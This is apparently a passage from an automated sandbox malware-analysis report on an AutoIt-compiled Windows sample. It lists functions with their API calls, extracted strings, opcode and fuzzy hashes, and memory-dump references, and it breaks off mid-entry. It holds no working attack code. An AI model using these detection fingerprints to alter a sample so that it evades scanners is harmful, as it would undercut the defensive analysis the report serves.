                                                                                                                    • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction ID: 53b2a654b7834886e1325a800f437ff7030697fc781798ac9befc277acd8a551
                                                                                                                    • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                                                                    • Instruction Fuzzy Hash: 6A41A561E0C6C159FB719B6096807792EA1EB25B44F4C4839C78AA32C2CF1FB89CD361
                                                                                                                    Function 00007FF655FEE774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF655FE6838: CreateFileW.KERNELBASE ref: 00007FF655FE68A2
                                                                                                                      • Part of subcall function 00007FF656004380: GetCurrentDirectoryW.KERNEL32(?,00007FF655FEE817), ref: 00007FF65600439C
                                                                                                                      • Part of subcall function 00007FF655FE56D4: GetFullPathNameW.KERNEL32(?,00007FF655FE56C1,?,00007FF655FE7A0C,?,?,?,00007FF655FE109E), ref: 00007FF655FE56FF
                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF655FEE8B0
                                                                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF655FEE9FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 2207129308-1018226102
                                                                                                                    • Opcode ID: 2a69bdd886e9ac72b7d1c8a7d9528a7ebc75df003de855e9445a1c7f728e3f3e
                                                                                                                    • Instruction ID: 8fee6344d64498c5291240807d0c820e0e8dc75d1deff4ee400a82e74057090d
                                                                                                                    • Opcode Fuzzy Hash: 2a69bdd886e9ac72b7d1c8a7d9528a7ebc75df003de855e9445a1c7f728e3f3e
                                                                                                                    • Instruction Fuzzy Hash: 8D12F936A0C64386EB50EF25E5445FD7360FB84B98F880132EA4EA7699DF7DD909CB00
                                                                                                                    Function 00007FF6560766B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 636576611-1287834457
                                                                                                                    • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                    • Instruction ID: 885aef44590e2e6d6af48dcf7f7f86e9c53639aacc98d37cbab164aa5c75e785
                                                                                                                    • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                                                                    • Instruction Fuzzy Hash: C9718D22A18B0781EB549F26E6401BD2760FB84F98F584431DE0EA77A5DF7EE48DC300
                                                                                                                    Function 00007FF65601D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                    • API String ID: 3215553584-2617248754
                                                                                                                    • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction ID: 3f325934906fe54f4f9b34afa53ac4627342b4c3e9a2fb5cf1c206658167f744
                                                                                                                    • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                                                                    • Instruction Fuzzy Hash: 2541AD32A09F4599F750CF25E9417AD33A5EB08398F48413AEE5CA7B94DE3ED429C340
                                                                                                                    Function 00007FF6560659D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                    • Instruction ID: aef8b8e28e2097d499aaf762f7efac54bdb1d9dc0db677331373c1602846216b
                                                                                                                    • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                                    • Instruction Fuzzy Hash: 06419036A08A0295EB11DB25D5801BC7771FB88B98F4C8536DA0DA3BA5DF3DD98AC710
                                                                                                                    Function 00007FF6560576D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 4007322891-4153970271
                                                                                                                    • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction ID: f5f9fb81fb85a6c2f0151dd408b113171b8f5521f02e0b3011e1ea0928bc181d
                                                                                                                    • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                                    • Instruction Fuzzy Hash: 6C31B336A18A8391EB50DB21E9455BD7361FF84B84F888032EA4DA37A9DF7DD509CB40
                                                                                                                    Function 00007FF65604E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                    • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction ID: 1a51d038f4bff98656293805b72c1513fca0a53a14b2a6684f9d93a683dcd6c5
                                                                                                                    • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                                    • Instruction Fuzzy Hash: DD31F735A09B4181EA209B12E9141BD6362FF99FE4F484231DBADA77D5CF3DD509C740
                                                                                                                    Function 00007FF65604E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2573188126-1403004172
                                                                                                                    • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                                    • Instruction ID: 53af5d99f0ecb95805f9808c3e778729ea9ecb5d178cd1d9d67471814f8f1c7e
                                                                                                                    • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                                    • Instruction Fuzzy Hash: BA310435B09B8282EB209B16EA541BD6362FF98FE4F484130DF9DA3795DE2DD509C740
                                                                                                                    Function 00007FF656090D7C Relevance: 15.2, APIs: 10, Instructions: 209windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2672075419-0
                                                                                                                    • Opcode ID: 5fa25485af76456d7d7e616ea4c07056e60c9aaa2ebc56c0ea0a72266ee9f790
                                                                                                                    • Instruction ID: 974d243bf0d4e204ecb5ead21bd78ab086471649c15b83e017e03422a0c4f043
                                                                                                                    • Opcode Fuzzy Hash: 5fa25485af76456d7d7e616ea4c07056e60c9aaa2ebc56c0ea0a72266ee9f790
                                                                                                                    • Instruction Fuzzy Hash: 67919336B096528AFB50CF61D6543BD23A2FB84B8CF584035DE0EA3799DE7AE459C700
                                                                                                                    Function 00007FF6560592E4 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction ID: 4ab62886be895aa8d77afdc68e211ec6cdf695fb6fb1b6d30f6a0b189c30ab15
                                                                                                                    • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                                    • Instruction Fuzzy Hash: C6319F34B0864286EB559B26EA5463976B2BF58790F184535CD0EE3754EE3FEC4DCB00
                                                                                                                    Function 00007FF65604E908 Relevance: 15.1, APIs: 10, Instructions: 59keyboardsleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 685491774-0
                                                                                                                    • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                                    • Instruction ID: 868b639aead596d67202c56c564172bd7b1c2ec29cfa6d1a3e88648d1a95b3f9
                                                                                                                    • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                                    • Instruction Fuzzy Hash: 13118E35B0450282E7259F66E95897E2262AFCCB84F485038C94A9BBA0DE3ED558C340
                                                                                                                    Function 00007FF65604F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 0-1603158881
                                                                                                                    • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction ID: 9d21876b1f8370ce9567b1921f2550845b20625d04e6e695f15f12bd732c8a75
                                                                                                                    • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                                    • Instruction Fuzzy Hash: 2D12D662B1964352FEB89F21CA112F96291BFB4785F8C4531CA5DE7391EFBEE548C200
                                                                                                                    Function 00007FF65607767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Init$Clear
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                    • API String ID: 3467423407-1765764032
                                                                                                                    • Opcode ID: a0470de27205f542ebe67e6bc39c13d5e7d83ba962feb8b7bffed10a95e69b5b
                                                                                                                    • Instruction ID: eca1fcc58611b26bddec551c0b229091f3058bed87309eb5da48e5c24914e71a
                                                                                                                    • Opcode Fuzzy Hash: a0470de27205f542ebe67e6bc39c13d5e7d83ba962feb8b7bffed10a95e69b5b
                                                                                                                    • Instruction Fuzzy Hash: 5AA1AD32B08B4286EB208F65E5406BE77A1FB98B98F484136DE4DA3794DF7DE449C700
                                                                                                                    Function 00007FF65608A350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                                    • String ID: -----$SysListView32
                                                                                                                    • API String ID: 2361508679-3975388722
                                                                                                                    • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                    • Instruction ID: 5c39a95be1a54c823511cc492251443914b3f3369b6218b4c0f498694cf7796f
                                                                                                                    • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                                    • Instruction Fuzzy Hash: 5A51C432A047918AE720CF25E9446DE33B5FB84788F44413ADE4D97B55CF3ADA99CB40
                                                                                                                    Function 00007FF65604E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 2019164449-3381328864
                                                                                                                    • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                    • Instruction ID: 993ecbbdf7ee2e73b586796e3a61526da27d1b51c0df9cdbedc94305d4a4d741
                                                                                                                    • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                                    • Instruction Fuzzy Hash: 2C214F61B1C54380FE619B12EB487792351AF91B9AF488035C94DE76A5EE6EE20EC700
                                                                                                                    Function 00007FF656077054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1903627254-0
                                                                                                                    • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction ID: ec80c97be047d4abc47ff80db2420a7f6b972699b6566109607a0e438cc2abde
                                                                                                                    • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                                                    • Instruction Fuzzy Hash: 4B027D62A18A8682DB50DF2AD5841BD6760FB84F98F584032EF4E97B68CF7DD549CB00
                                                                                                                    Function 00007FF65608C324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
